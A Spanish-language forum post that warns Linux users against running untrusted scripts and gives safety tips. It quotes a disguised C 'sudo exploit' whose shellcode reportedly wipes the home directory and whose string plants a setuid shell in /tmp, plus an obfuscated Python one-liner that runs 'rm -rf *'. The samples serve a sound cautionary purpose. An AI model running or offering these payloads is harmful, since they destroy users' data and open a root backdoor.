No te preocupes Fernando yo acabe desinstalandolo porque me hacia el nautilus mas lento.Asi que bueno,quizas hay gente que no le pase pero te aconsejaria que si te pasa lo mismo con el nautilus,hagas lo mismo que yo,por lo menos hasta descubrir de que se trata y si tiene remedio, los zombies solo me gustan verlos en las peliculas.
Saludos,amigo.
Los
Scripts son programas creados por gente malvada o en caso de un script limpio,gente enrrollada.Siempre hay que
leer el código fuente de cualquier cosa descargada de una fuente no fiable o cruzar los dedos y tomarse una tila mientras se ejecuta (la efectividad de este método no está probada). Como ejemplo, el mensaje en una lista de correo que ofrecía un programilla en C para aprovecharse de un exploit del comando sudo, veamos la parte interesante del mismo:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Este trozo de código hexadecimal ejecuta un bonito rm -rf ~ / &, borraremos nuestro home y si somos root todo el disco, bonito atrapa script kiddies :twisted:
Hay que tener cuidado en especial al tocar otros comandos como chmod, chown y chgrp que alteran los permisos, propietario y grupo de los ficheros ya que podríamos conceder acceso a cualquiera o dejar el sistema hecho un desastre si se aplican de forma recursiva sin control.
También recordar que todos estos comandos se pueden ejecutar mediante scripts en lenguajes como python, por ejemplo este código:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Ejecuta un rm -rf * oculto tras el “sn!.sg!+”.
Consejos para evitar cargarnos nuestro propio sistema:
* Aprender los comandos básicos de Linux, si vamos a ejecutar algo mirar qué hace con man.
* Sólo ejecutar código proporcionado en sitios fiables y aun así mirar qué hace, así aprenderemos, que nunca está de más.
* Tener un poco de sentido común, si vemos a alguien diciendo “¡Ej3cu74 3st0 y t3ndr4s 4cc3so0 i1im174d0 al ord3n4d0r d3 14 NASA!” no te enfundes tu sombrero de copa y empieces a copy/pastear.
